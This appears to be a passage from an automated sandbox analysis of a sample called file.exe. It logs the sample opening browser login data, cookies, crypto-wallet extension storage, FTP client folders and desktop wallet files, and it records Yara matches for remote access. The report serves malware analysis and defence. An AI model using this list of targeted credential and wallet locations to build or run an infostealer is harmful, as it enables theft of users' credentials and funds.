Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: Yara match File source: 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP